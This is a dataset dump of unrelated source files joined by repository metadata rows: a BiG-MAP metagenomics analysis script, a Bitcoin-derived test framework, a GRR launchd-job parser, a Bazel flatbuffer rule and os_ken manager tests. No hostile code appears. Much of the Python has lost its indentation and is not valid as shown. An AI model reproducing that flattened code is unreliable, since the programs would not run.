2) Filter the biom dict on the inputted metatype and convert to a pandas dataframe
3) Normalize the data based on the normalization of metagenomeSeq
4) Structure the data and create the explore heatmap if requested
    5) Run the Kruskal-Wallis test if requested
6) Run the fit-ZIG model if requested
"""
args = get_arguments()
matplotlib.use('agg')
if not args.compare and not args.explore:
print("Please use the --compare or --explore flag")
sys.exit()
sample_type = (args.sample_type).upper()
#create output dir if it does not exist
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# Creating json formatted file from biom
print("__________Loading biom file_______________________")
json_file = export2biom(args.biom_file, args.outdir)
with open(json_file, "r") as jfile:
biom_dict = json.load(jfile)
# Filtering input data
sample_index, sample_list, metadata = get_sample_type(sample_type, \
biom_dict, args.metagroup)
index_list = filter_rows(biom_dict, sample_index)
gc_values = get_gc_ids(biom_dict, index_list, sample_index)
# Making a pandas dataframe and normalize the data
gc_df = make_dataframe(gc_values, sample_list)
norm_df = norm_log2_data(gc_df)
gc_df.to_csv((os.path.join(args.outdir, 'all_RPKMs.tsv')), sep='\t')
norm_df.to_csv((os.path.join(args.outdir, 'all_RPKMs_norm.tsv')), sep='\t')
if args.explore:
print("__________Making explore heatmap__________________")
# Extract the coverage scores from the BIOM file
dict_cov = get_coverage(biom_dict, sample_list, list(gc_values.keys()))
cov = make_dataframe(dict_cov, sample_list)
cov.to_csv((os.path.join(args.outdir, 'coverage.tsv')), sep='\t')
sign_gc, sign_cov = best_cov(cov, norm_df, args.threshold)
# Make the explore heatmap
if sample_type == "METATRANSCRIPTOMIC":
gc_names, sign_hg, id_list = get_relevant_hg(sign_gc, norm_df)
pandas_hg = make_hg_df(gc_names, sign_hg, id_list, norm_df)
gc_sorted, meta_types = sort_coverage(sign_gc, sign_cov, metadata)
hg_sorted = sort_housekeeping(sign_gc, pandas_hg, sign_cov)
hg_sorted.to_csv((os.path.join(args.outdir, 'explore_HGs.tsv')), sep='\t')
gc_sorted.to_csv((os.path.join(args.outdir, 'explore_GCs.tsv')), sep='\t')
if args.file_name_explore:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, args.file_name_explore, hg_sorted)
else:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, "explore_heatmap", hg_sorted)
else:
gc_sorted, meta_types = sort_coverage(sign_gc, sign_cov, metadata)
gc_sorted.to_csv((os.path.join(args.outdir, 'explore_GCs.tsv')), sep='\t')
if args.file_name_explore:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, args.file_name_explore)
else:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir)
if not args.compare:
            os.remove(os.path.join(args.outdir, "BiG-MAP.table.txt"))
movetodir(args.outdir + os.sep, "tsv-results", ".tsv")
if args.compare and args.groups:
group1 = args.groups[0]
group2 = args.groups[1]
print("__________Kruskal-wallis model____________________")
# run the Kruskal Wallis model
kruskal_results = kruskal_wallis(norm_df, metadata, args.groups)
# parse the output and get the significant GCs
sign_kw, meta_types = parse_results(kruskal_results, norm_df, args.groups, \
metadata, args.alpha_kruskal, "kruskal")
if args.file_names_compare and len(args.file_names_compare) == 2:
kruskal_file = args.file_names_compare[0]
fitzig_file = args.file_names_compare[1]
        elif args.file_names_compare and len(args.file_names_compare) != 2:
            print("Please input two output file names for the Kruskal-Wallis \
and fitZIG heatmaps. For instance: UCvsCD_kw UCvsCD_fz")
            sys.exit()
else:
kruskal_file = f"{group1}vs{group2}_kw"
fitzig_file = f"{group1}vs{group2}_fz"
if meta_types == []:
pass
else:
# get coverage
dict_cov = get_coverage(biom_dict, list(sign_kw), sign_kw.index)
cov = make_dataframe(dict_cov, list(sign_kw))
cov, group_meta = order_coverage(metadata, cov, args.groups)
# get log2 fold change
log_fold = get_log2fold(sign_kw, args.groups, group_meta)
if sample_type == "METATRANSCRIPTOMIC":
# get the relevant housekeeping genes
gc_names, sign_hg, id_list = get_relevant_hg(sign_kw, norm_df)
kw_hg_pandas = make_hg_df(gc_names, sign_hg, id_list, \
norm_df, args.groups, metadata)
sorted_cov, log_fold, sorted_gc = structure_data(sign_kw, cov, log_fold)
kw_hg_pandas = sort_housekeeping(sign_kw, kw_hg_pandas, cov)
kw_hg_pandas = kw_hg_pandas.replace(np.nan, 0.0)
kw_hg_pandas.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_HG_kw.tsv')), sep='\t')
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_kw.tsv')), sep='\t')
# make the kruskal wallis figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, kruskal_file, "kruskal", \
args.alpha_kruskal, kw_hg_pandas)
else:
sorted_cov, log_fold, sorted_gc = structure_data(sign_kw, cov, log_fold)
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_kw.tsv')), sep='\t')
# make the kruskal wallis figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, kruskal_file, "kruskal", args.alpha_kruskal)
print("__________Fit-ZIG model____________________")
# run the fitzig model in R
fitzig_results = run_fit_zig(args.biom_file, args.groups, args.metagroup, biom_dict, args.outdir)
# parse the output and get the significant GCs
sign_fit, meta_types = parse_results(fitzig_results, norm_df, args.groups, metadata, \
args.alpha_fitzig, "fitzig")
# get coverage
dict_cov = get_coverage(biom_dict, list(sign_fit), sign_fit.index)
cov = make_dataframe(dict_cov, list(sign_fit))
cov, group_meta = order_coverage(metadata, cov, args.groups)
# get log2 fold change
log_fold = get_log2fold(sign_fit, args.groups, group_meta)
if sample_type == "METATRANSCRIPTOMIC":
# get the relevant housekeeping genes
gc_names, sign_hg, id_list = get_relevant_hg(sign_fit, norm_df)
fit_hg_pandas = make_hg_df(gc_names, sign_hg, id_list, norm_df, args.groups, metadata)
sorted_cov, log_fold, sorted_gc= structure_data(sign_fit, cov, log_fold)
fit_hg_pandas = sort_housekeeping(sign_fit, fit_hg_pandas, cov)
fit_hg_pandas = fit_hg_pandas.replace(np.nan, 0.0)
fit_hg_pandas.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_HG_fz.tsv')), sep='\t')
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_fz.tsv')), sep='\t')
# make the fitzig figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, fitzig_file, "fitzig", args.alpha_fitzig, fit_hg_pandas)
else:
sorted_cov, log_fold, sorted_gc = structure_data(sign_fit, cov, log_fold)
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_fz.tsv')), sep='\t')
# make the fitzig figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, fitzig_file, "fitzig", args.alpha_fitzig)
        os.remove(os.path.join(args.outdir, "BiG-MAP.table.txt"))
movetodir(args.outdir + os.sep, "tsv-results", ".tsv")
if args.compare and not args.groups:
print("Please provide the group information")
sys.exit()
if __name__ == "__main__":
main()
| 42.021079 | 107 | 0.61051 |
4a1e4e6652844572d646069d018da79840be98ab | 20,320 | py | Python | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | ["MIT"] | null | null | null | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | ["MIT"] | null | null | null | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | ["MIT"] | 1 | 2021-03-02T12:51:18.000Z | 2021-03-02T12:51:18.000Z |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
from enum import Enum
import logging
import optparse
import os
import pdb
import shutil
import sys
import tempfile
import time
import traceback
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
initialize_datadir,
log_filename,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class BitcoinTestFramework(object):
"""Base class for a likemeeeshare test script.
Individual likemeeeshare test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.mocktime = 0
self.set_test_params()
assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave likemeeeshareds and test.* datadir on exit or error")
parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop likemeeeshareds after the test execution")
parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../src"),
help="Source directory containing likemeeeshared/likemeeeshare-cli (default: %default)")
parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs")
parser.add_option("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_option("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_option("--configfile", dest="configfile",
help="Location of the test framework config file")
parser.add_option("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
self.add_options(parser)
(self.options, self.args) = parser.parse_args()
PortSeed.n = self.options.port_seed
os.environ['PATH'] = self.options.srcdir + ":" + self.options.srcdir + "/qt:" + os.environ['PATH']
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
success = TestStatus.FAILED
try:
self.setup_chain()
self.setup_network()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException as e:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: %s" % e.message)
success = TestStatus.SKIPPED
except AssertionError as e:
self.log.exception("Assertion failed")
except KeyError as e:
self.log.exception("Key error")
except Exception as e:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt as e:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
self.log.info("Note: likemeeeshareds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up")
shutil.rmtree(self.options.tmpdir)
else:
self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
if os.getenv("PYTHON_DEBUG", ""):
# Dump the end of the debug logs, to aid in debugging rare
# travis failures.
import glob
filenames = [self.options.tmpdir + "/test_framework.log"]
filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
MAX_LINES_TO_PRINT = 1000
for fn in filenames:
try:
with open(fn, 'r') as f:
print("From", fn, ":")
print("".join(deque(f, MAX_LINES_TO_PRINT)))
except OSError:
print("Opening file %s failed." % fn)
traceback.print_exc()
if success == TestStatus.PASSED:
self.log.info("Tests successful")
sys.exit(TEST_EXIT_PASSED)
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
sys.exit(TEST_EXIT_SKIPPED)
else:
self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
logging.shutdown()
sys.exit(TEST_EXIT_FAILED)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes, i, i + 1)
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test scripts.
def add_nodes(self, num_nodes, extra_args=None, rpchost=None, timewait=None, binary=None):
"""Instantiate TestNode objects"""
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [None] * num_nodes
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(i, self.options.tmpdir, extra_args[i], rpchost, timewait=timewait, binary=binary[i], stderr=None, mocktime=self.mocktime, coverage_dir=self.options.coveragedir))
def start_node(self, i, extra_args=None, stderr=None):
"""Start a likemeeeshared"""
node = self.nodes[i]
node.start(extra_args, stderr)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None):
"""Start multiple likemeeeshareds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i])
for node in self.nodes:
node.wait_for_rpc_connection()
except:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def stop_node(self, i):
"""Stop a bitcoind test node"""
self.nodes[i].stop_node()
self.nodes[i].wait_until_stopped()
def stop_nodes(self):
"""Stop multiple bitcoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node()
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def assert_start_raises_init_error(self, i, extra_args=None, expected_msg=None):
with tempfile.SpooledTemporaryFile(max_size=2**16) as log_stderr:
try:
self.start_node(i, extra_args, stderr=log_stderr)
self.stop_node(i)
except Exception as e:
assert 'likemeeeshared exited' in str(e) # node must have shutdown
self.nodes[i].running = False
self.nodes[i].process = None
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8')
if expected_msg not in stderr:
raise AssertionError("Expected error \"" + expected_msg + "\" not found in:\n" + stderr)
else:
if expected_msg is None:
assert_msg = "likemeeeshared should have exited with an error"
else:
assert_msg = "likemeeeshared should have exited with expected error " + expected_msg
raise AssertionError(assert_msg)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes, 1, 2)
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
def enable_mocktime(self):
"""Enable mocktime for the script.
mocktime may be needed for scripts that use the cached version of the
blockchain. If the cached version of the blockchain is used without
mocktime then the mempools will not sync due to IBD.
        For backward compatibility of the python scripts with previous
versions of the cache, this helper function sets mocktime to Jan 1,
2014 + (201 * 10 * 60)"""
self.mocktime = 1388534400 + (201 * 10 * 60)
def disable_mocktime(self):
self.mocktime = 0
# Private helper methods. These should not be accessed by the subclass test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as bitcoind's debug.log with microprecision (so log files can be concatenated and sorted)
formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("LikemeeeshareRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(os.path.join(self.options.cachedir, 'node' + str(i))):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(os.path.join(self.options.cachedir, "node" + str(i))):
shutil.rmtree(os.path.join(self.options.cachedir, "node" + str(i)))
# Create cache directories, run bitcoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
args = [os.getenv("LITECOIND", "likemeeeshared"), "-server", "-keypool=1", "-datadir=" + datadir, "-discover=0"]
if i > 0:
args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
self.nodes.append(TestNode(i, self.options.cachedir, extra_args=[], rpchost=None, timewait=None, binary=None, stderr=None, mocktime=self.mocktime, coverage_dir=None))
self.nodes[i].args = args
self.start_node(i)
# Wait for RPC connections to be ready
for node in self.nodes:
node.wait_for_rpc_connection()
# Create a 200-block-long chain; each of the 4 first nodes
# gets 25 mature blocks and 25 immature.
# Note: To preserve compatibility with older versions of
# initialize_chain, only 4 nodes will generate coins.
#
# blocks are created with timestamps 10 minutes apart
# starting from 2010 minutes in the past
self.enable_mocktime()
block_time = self.mocktime - (201 * 10 * 60)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(self.nodes, block_time)
self.nodes[peer].generate(1)
block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.disable_mocktime()
for i in range(MAX_NODES):
os.remove(log_filename(self.options.cachedir, i, "debug.log"))
os.remove(log_filename(self.options.cachedir, i, "db.log"))
os.remove(log_filename(self.options.cachedir, i, "peers.dat"))
os.remove(log_filename(self.options.cachedir, i, "fee_estimates.dat"))
for i in range(self.num_nodes):
from_dir = os.path.join(self.options.cachedir, "node" + str(i))
to_dir = os.path.join(self.options.tmpdir, "node" + str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(self.options.tmpdir, i) # Overwrite port/rpcport in bitcoin.conf
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
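# Illustrative sketch (added for clarity, not part of the original file): a
# minimal test script built on BitcoinTestFramework. The node calls used below
# (generate, getblockcount) are assumed to be available on TestNode.
class ExampleMinimalTest(BitcoinTestFramework):
    """Start two connected nodes, mine a block and check that it propagates."""
    def set_test_params(self):
        self.num_nodes = 2
        self.setup_clean_chain = True
    def run_test(self):
        self.nodes[0].generate(1)
        self.sync_all()
        assert_equal(self.nodes[1].getblockcount(), 1)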
class ComparisonTestFramework(BitcoinTestFramework):
"""Test framework for doing p2p comparison testing
Sets up some likemeeeshared binaries:
- 1 binary: test binary
- 2 binaries: 1 test binary, 1 ref binary
- n>2 binaries: 1 test binary, n-1 ref binaries"""
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LITECOIND", "likemeeeshared"),
help="likemeeeshared binary to test")
parser.add_option("--refbinary", dest="refbinary",
default=os.getenv("LITECOIND", "likemeeeshared"),
help="likemeeeshared binary to use for reference nodes (if any)")
def setup_network(self):
extra_args = [['-whitelist=127.0.0.1']] * self.num_nodes
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args,
binary=[self.options.testbinary] +
[self.options.refbinary] * (self.num_nodes - 1))
self.start_nodes()
class SkipTest(Exception):
"""This exception is raised to skip a test"""
def __init__(self, message):
self.message = message
| 42.157676 | 310 | 0.617569 |
4a1e4ea245c9e51a35ab7f088a0150366bf5f840 | 2,849 | py | Python | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | ["Apache-2.0"] | 4,238 | 2015-01-01T15:34:50.000Z | 2022-03-31T08:18:05.000Z | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | ["Apache-2.0"] | 787 | 2015-01-02T21:34:24.000Z | 2022-03-02T13:26:38.000Z | grr/core/grr_response_core/lib/parsers/osx_launchd.py | khanhgithead/grr | 8ad8a4d2c5a93c92729206b7771af19d92d4f915 | ["Apache-2.0"] | 856 | 2015-01-02T02:50:11.000Z | 2022-03-31T11:11:53.000Z |
#!/usr/bin/env python
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX launchd jobs."""
import re
from typing import Iterator
from grr_response_core.lib import parsers
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.rdfvalues import standard as rdf_standard
class OSXLaunchdJobDict(object):
"""Cleanup launchd jobs reported by the service management framework.
Exclude some rubbish like logged requests that aren't real jobs (see
launchctl man page). Examples:
Exclude 0x7f8759d30310.anonymous.launchd
Exclude 0x7f8759d1d200.mach_init.crash_inspector
Keep [0x0-0x21021].com.google.GoogleDrive
We could probably just exclude anything starting with a memory address, but
I'm being more specific here as a tradeoff between sensible results and places
for malware to hide.
"""
def __init__(self, launchdjobs):
"""Initialize.
Args:
launchdjobs: NSCFArray of NSCFDictionarys containing launchd job data from
the ServiceManagement framework.
"""
self.launchdjobs = launchdjobs
self._filter_regexes = [
re.compile(r"^0x[a-z0-9]+\.anonymous\..+$"),
re.compile(r"^0x[a-z0-9]+\.mach_init\.(crash_inspector|Inspector)$"),
]
def Parse(self):
"""Parse the list of jobs and yield the good ones."""
for item in self.launchdjobs:
if not self.FilterItem(item):
yield item
def FilterItem(self, launchditem):
"""Should this job be filtered.
Args:
launchditem: job NSCFDictionary
Returns:
True if the item should be filtered (dropped)
"""
for regex in self._filter_regexes:
if regex.match(launchditem.get("Label", "")):
return True
return False
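# Illustrative sketch (added for clarity, not part of the original module):
# filtering a list of launchd job dictionaries. The job data below is made up.
def _example_filter_launchd_jobs():
  jobs = [
      {"Label": "0x7f8759d30310.anonymous.launchd"},  # dropped by the filter
      {"Label": "[0x0-0x21021].com.google.GoogleDrive"},  # kept
  ]
  return list(OSXLaunchdJobDict(jobs).Parse())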
class DarwinPersistenceMechanismsParser(
parsers.SingleResponseParser[rdf_standard.PersistenceFile]):
"""Turn various persistence objects into PersistenceFiles."""
output_types = [rdf_standard.PersistenceFile]
supported_artifacts = ["DarwinPersistenceMechanisms"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdfvalue.RDFValue,
) -> Iterator[rdf_standard.PersistenceFile]:
"""Convert persistence collector output to downloadable rdfvalues."""
pathspec = None
if isinstance(response, rdf_client.OSXServiceInformation):
if response.program:
pathspec = rdf_paths.PathSpec(
path=response.program, pathtype=rdf_paths.PathSpec.PathType.UNSET)
elif response.args:
pathspec = rdf_paths.PathSpec(
path=response.args[0], pathtype=rdf_paths.PathSpec.PathType.UNSET)
if pathspec is not None:
yield rdf_standard.PersistenceFile(pathspec=pathspec)
| 31.655556 | 80 | 0.726571 |
4a1e4f1063e437dcb47dac87415467184385880d | 409 | bzl | Python | bazel/ray.bzl | FieldMrFive/ray | a22d6ef95594a3b95fac5b2eb17f7f21be2888e8 | ["Apache-2.0"] | 3 | 2019-05-01T04:31:20.000Z | 2021-03-01T09:25:36.000Z | bazel/ray.bzl | collinswei/ray | 2e30f7ba386e716bf80f019dcd473b67d83abb95 | ["Apache-2.0"] | 2 | 2019-01-28T00:31:25.000Z | 2019-11-26T16:57:06.000Z | bazel/ray.bzl | collinswei/ray | 2e30f7ba386e716bf80f019dcd473b67d83abb95 | ["Apache-2.0"] | 2 | 2020-03-26T16:32:08.000Z | 2021-02-05T17:04:11.000Z |
load("@com_github_google_flatbuffers//:build_defs.bzl", "flatbuffer_library_public")
def flatbuffer_py_library(name, srcs, outs, out_prefix, includes = [], include_paths = []):
flatbuffer_library_public(
name = name,
srcs = srcs,
outs = outs,
language_flag = "-p",
out_prefix = out_prefix,
include_paths = include_paths,
includes = includes,
)
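# Example BUILD usage (illustrative; the target and file names below are
# hypothetical, not taken from the repository):
# flatbuffer_py_library(
#     name = "example_fbs_py",
#     srcs = ["example.fbs"],
#     outs = ["example_generated.py"],
#     out_prefix = "python/generated/",
# )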
| 31.461538 | 91 | 0.643032 |
4a1e4f489d4286312d9f8c34644e531a8a6981a9 | 2,237 | py | Python | os_ken/tests/unit/cmd/test_manager.py | rolaya/os-ken | 10009e41539c737c7c423f13e4f5bc5f46d219ff | ["Apache-2.0"] | 1 | 2019-04-24T04:01:07.000Z | 2019-04-24T04:01:07.000Z | os_ken/tests/unit/cmd/test_manager.py | anlaneg/os-ken | 379a7694c3129cc0156343af71f4fca8830d9de5 | ["Apache-2.0"] | null | null | null | os_ken/tests/unit/cmd/test_manager.py | anlaneg/os-ken | 379a7694c3129cc0156343af71f4fca8830d9de5 | ["Apache-2.0"] | null | null | null |
# Copyright (C) 2013,2014 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013,2014 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import mock
from nose.tools import eq_, raises
try:
# Python 3
from imp import reload
except ImportError:
# Python 2
pass
from os_ken.cmd.manager import main
class Test_Manager(unittest.TestCase):
"""Test osken-manager command
"""
def __init__(self, methodName):
super(Test_Manager, self).__init__(methodName)
def setUp(self):
pass
def tearDown(self):
pass
@raises(SystemExit)
@mock.patch('sys.argv', new=['osken-manager', '--version'])
def test_version(self):
main()
@raises(SystemExit)
@mock.patch('sys.argv', new=['osken-manager', '--help'])
def test_help(self):
main()
@staticmethod
def _reset_globals():
# hack to reset globals like SERVICE_BRICKS.
# assumption: this is the only test which actually starts OSKenApp.
import os_ken.base.app_manager
import os_ken.ofproto.ofproto_protocol
reload(os_ken.base.app_manager)
reload(os_ken.ofproto.ofproto_protocol)
@mock.patch('sys.argv', new=['osken-manager', '--verbose',
'os_ken.tests.unit.cmd.dummy_app'])
def test_no_services(self):
self._reset_globals()
main()
self._reset_globals()
@mock.patch('sys.argv', new=['osken-manager', '--verbose',
'os_ken.tests.unit.cmd.dummy_openflow_app'])
def test_openflow_app(self):
self._reset_globals()
main()
self._reset_globals()
| 28.679487 | 77 | 0.664283 |
